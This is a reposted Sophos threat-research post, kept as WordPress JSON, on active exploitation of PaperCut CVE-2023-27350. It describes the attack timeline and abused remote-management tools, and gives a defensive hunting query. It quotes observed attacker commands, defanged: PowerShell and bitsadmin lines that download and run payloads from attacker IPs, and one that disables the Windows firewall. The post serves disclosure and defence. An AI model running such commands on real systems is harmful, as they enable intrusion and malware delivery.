{"id":21893,"date":"2023-05-02T03:20:54","date_gmt":"2023-05-02T11:20:54","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2023\/05\/02\/news-15624\/"},"modified":"2023-05-02T03:20:54","modified_gmt":"2023-05-02T11:20:54","slug":"news-15624","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2023\/05\/02\/news-15624\/","title":{"rendered":"Update 1: Increased exploitation of PaperCut drawing blood around the Internet"},"content":{"rendered":"<p><strong>Credit to Author: Angela Gunn| Date: Thu, 27 Apr 2023 18:43:38 +0000<\/strong><\/p>\n<div class=\"entry-content lg:prose-lg mx-auto prose max-w-4xl\">\n<p><em>Last updated 2023-05-02 08:45:00: Added \u201cTimeline and Other Sophos Information\u201d section<\/em><\/p>\n<p><em>2023-04-26 17:50:00: First publication<\/em><\/p>\n<p><span class=\"ui-provider gr b c d e f g h i j k l m n o p q r s t u v w x y z ab ac ae af ag ah ai aj ak\" dir=\"ltr\">Sophos X-Ops MDR and SophosLabs teams have been monitoring and researching activity around the PaperCut vulnerability CVE-2023-27350 since April 13, 2023. In this posting we outline our observations on the threat environment around this vulnerability.<\/span><\/p>\n<p>On April 19, 2023, software company PaperCut published an update to their <a href=\"https:\/\/www.papercut.com\/kb\/Main\/PO-1216-and-PO-1219\">advisory<\/a> indicating exploitation of CVE-2023-27350 has been reported in the wild. PaperCut offers multi-platform print management software, popular in the education sector. The vulnerability leveraged in the attack was in fact already addressed by a patch released the month prior \u2013 a situation commonly called an <em>n<\/em>-day attack.<\/p>\n<p>This vulnerability affects PaperCut MF and NG Application and Site Servers version 8.0 and above across all supported operating systems. 
A patch was made available on March 8 and Sophos recommends that you <a href=\"https:\/\/www.papercut.com\/kb\/Main\/Upgrading#application-server-upgrade\">apply it<\/a> at the earliest opportunity on all vulnerable servers.<\/p>\n<p>Sophos\u2019 earliest observation of an affected user occurred on April 13. That attack was identified by a SophosLabs threat researcher when Cobalt Strike was detected during post-exploitation activity. On April 17 &#8212; four days later and two days prior to the public announcement &#8212; Sophos MDR detected exploitation of a vulnerable PaperCut server at a customer in North America. We quickly contained the affected server and engaged the customer to proceed with remediation.<\/p>\n<p>To date, we have observed multiple threat groups target potential victims globally, with a disproportionate share of victims in the education sector.<\/p>\n<h3>Technical Details<\/h3>\n<p>The vulnerability details provided by Trend Micro\u2019s <a href=\"https:\/\/www.zerodayinitiative.com\/advisories\/ZDI-23-233\/\">ZDI<\/a> indicate that the code allowing authentication bypass and remote code execution is found in the SetupCompleted Java class. At the time of exploitation, Sophos MDR observed the following error log being generated:<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/04\/figure-01.jpg\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-91350\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/04\/figure-01.jpg\" alt=\"Two error messages spotted early in the PaperCut attack\" width=\"608\" height=\"25\" \/><\/a><\/p>\n<p><em>Figure 1: Error messages are an early sign that something is amiss<\/em><\/p>\n<p>Post-exploitation activity often results in PowerShell commands being executed by the pc-app.exe parent process, as seen in Figure 2, where PowerShell downloads Atera remote monitoring software to the victim. 
(Atera is of course legitimate software, seen in this situation being abused by the attackers.)<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/04\/figure-too.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-91357\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/04\/figure-too.png\" alt=\"PowerShell downloading a copy of Atera\" width=\"640\" height=\"186\" \/><\/a><\/p>\n<p><em>Figure 2: PowerShell download of legitimate-but-abused Atera software<\/em><\/p>\n<p>This is just one example observed, as different threat groups execute PowerShell in a variety of ways.<\/p>\n<pre>powershell IEX ((New-Object Net.WebClient).DownloadString ('http:\/\/137.184.56[.]77:443\/for.ps1'))\n\npowershell.exe Invoke-WebRequest http:\/\/137.184.56[.]77:443\/c.bat -OutFile c.bat\n\npowershell $url=\"https:\/\/tmpfiles[.]org\/dl\/1337855\/enc.txt\"\n$dst=\"C:encexe\"\nnetsh advfirewall set allprofiles state off\nInvoke-WebRequest $url -OutFile $dst\nStart-Process $dst -windowstyle hidden\nStart-Sleep -s 10<\/pre>\n<p>Sophos MDR has also observed the use of BITSAdmin, a commonly abused <a href=\"https:\/\/news.sophos.com\/en-us\/2023\/04\/25\/2023-active-adversary-report-for-business-leaders\/\">LOLBin<\/a>, to download additional tools.<\/p>\n<pre>bitsadmin \/transfer dwa \/download \/priority FOREGROUND http[:]\/\/23.184.48[.]17\/bootcamp.zip C:ProgramDatabootcamp.zip\n\nbitsadmin \/transfer mydownloadjob \/download \/priority normal http[:]\/\/192.184.35[.]216:443\/4591187629.exe %WINDIR%setup2.exe<\/pre>\n<p>The tools used in the attacks have included what we refer to as \u201cdual-use agents,\u201d used both legitimately by IT staff and maliciously by attackers. 
At the time of writing, Sophos has observed the abuse of AnyDesk, Atera, Synchro, TightVNC, NetSupport, and DWAgent remote management tools across multiple campaigns.<\/p>\n<p>Additionally, some of the final payloads overlap with previously reported threats such as Truebot (downloader, often linked to Cl0p ransomware), Buhti (ransomware), MoneroOcean (<a href=\"https:\/\/news.sophos.com\/en-us\/2021\/12\/02\/two-flavors-of-tor2mine-miner-dig-deep-into-networks-with-powershell-vbscript\/\">coinminer<\/a>), and Mirai (botnet). One such miner, shown in Figure 3, runs commands to kill competing miners before launching its own Monero (XMR) mining software.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/04\/figure-03-1.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-91348\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/04\/figure-03-1.png\" alt=\"Finding screen showing miners removing other miners during an attack on PaperCut\" width=\"575\" height=\"375\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/04\/figure-03-1.png 575w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/04\/figure-03-1.png?resize=300,196 300w\" sizes=\"auto, (max-width: 575px) 100vw, 575px\" \/><\/a><\/p>\n<p><em>Figure 3: Miner-on-miner violence<\/em><\/p>\n<h3>Determining impact with Sophos XDR<\/h3>\n<p>Upon receiving updated threat intelligence, Sophos MDR threat hunters immediately started searching across our customer base for any additional affected users. The following SQL query can be used by Sophos XDR customers in their Sophos Central console to identify suspicious activity, and it can also be converted into a Sigma rule for non-Sophos customers. Generally, command-line executions performing system discovery with native tools (LOLBins) such as whoami, nltest, and systeminfo can indicate compromise and help trace activity back to the point of initial access. 
If suspicious commands are observed, we recommend isolating the system while it is under investigation. Note that a common false positive observed in the process activity was the PaperCut print archive function.<\/p>\n<pre>SELECT\n    date_format(from_unixtime(TIME,'%Y-%m-%d %H:%i:%s') AS date_time,\n    customer_id,\n    meta_hostname,\n    parent_name,\n    parent_cmdline,\n    name,\n    cmdline,\n    sophos_pid\nFROM\n    xdr_data\nWHERE\n    query_name = 'running_processes_windows_sophos'\n    AND LOWER(parent_name) = 'pc-app.exe'\n    AND (LOWER(name) = 'cmd.exe'\n         OR LOWER(name) = 'powershell.exe')<\/pre>\n<p>As noted above, a patch is available; this situation falls into the category of attacks known as \u201c<em>n<\/em>-days\u201d \u2013 an exploit that appears very soon after a patch is issued. Potentially affected users are encouraged to review and apply the patch as soon as possible. Our GitHub <a href=\"https:\/\/github.com\/sophoslabs\/IoCs\/blob\/master\/papercut-nday-indicators-of-compromise.csv\">includes<\/a> a set of Indicators of Compromise associated with this attack campaign. 
SophosLabs continues to monitor the situation closely for potential AV detections.<\/p>\n<h3>Timeline and Further Sophos Resources<\/h3>\n<p>As our investigation continues, we\u2019ve developed a (simplified) timeline of PaperCut-related events as they unfolded in our data. In addition, there\u2019s more information about PaperCut on the <a href=\"https:\/\/nakedsecurity.sophos.com\/2023\/04\/25\/papercut-security-vulnerabilities-under-active-attack-vendor-urges-customers-to-patch\/\">Naked Security blog<\/a> (which includes a tidy checklist for PaperCut customers) and the <a href=\"https:\/\/nakedsecurity.sophos.com\/2023\/04\/27\/s3-ep132-proof-of-concept-lets-anyone-hack-at-will\/\">Naked Security podcast<\/a>.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/04\/papercut-timeline.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-91415\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/04\/papercut-timeline.png\" alt=\"A timeline showing PaperCut-related artifacts 13-26 April\" width=\"593\" height=\"1736\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/04\/papercut-timeline.png 593w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/04\/papercut-timeline.png?resize=102,300 102w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/04\/papercut-timeline.png?resize=350,1024 350w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/04\/papercut-timeline.png?resize=525,1536 525w\" sizes=\"auto, (max-width: 593px) 100vw, 593px\" \/><\/a><\/p>\n<h3>Acknowledgements<\/h3>\n<p>Benjamin Sollman, Colin Cowie, Greg Iddon, and Gabor Szappanos contributed to this report.<\/p>\n<\/div>\n<p><a href=\"https:\/\/news.sophos.com\/en-us\/2023\/04\/27\/increased-exploitation-of-papercut-drawing-blood-around-the-internet\/\" target=\"bwo\" >http:\/\/feeds.feedburner.com\/sophos\/dgdY<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" 
src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/04\/shutterstock_1830290738-e1682619995971.jpg\"\/><\/p>\n<p><strong>Credit to Author: Angela Gunn| Date: Thu, 27 Apr 2023 18:43:38 +0000<\/strong><\/p>\n<p>A recent remote code execution (RCE) vulnerability is increasingly in use to deliver Cobalt Strike and other remote management software, along with multiple ransomware threats \u2013 what you need to know about CVE-2023-27350<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10378,10377],"tags":[29220,129,25038,29221,29216,24552,27604],"class_list":["post-21893","post","type-post","status-publish","format-standard","hentry","category-security","category-sophos","tag-cve-2023-27350","tag-featured","tag-mdr","tag-mdr-flash","tag-papercut","tag-security-operations","tag-sophos-mdr"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/21893","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=21893"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/21893\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=21893"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=21893"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/w
p-json\/wp\/v2\/tags?post=21893"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}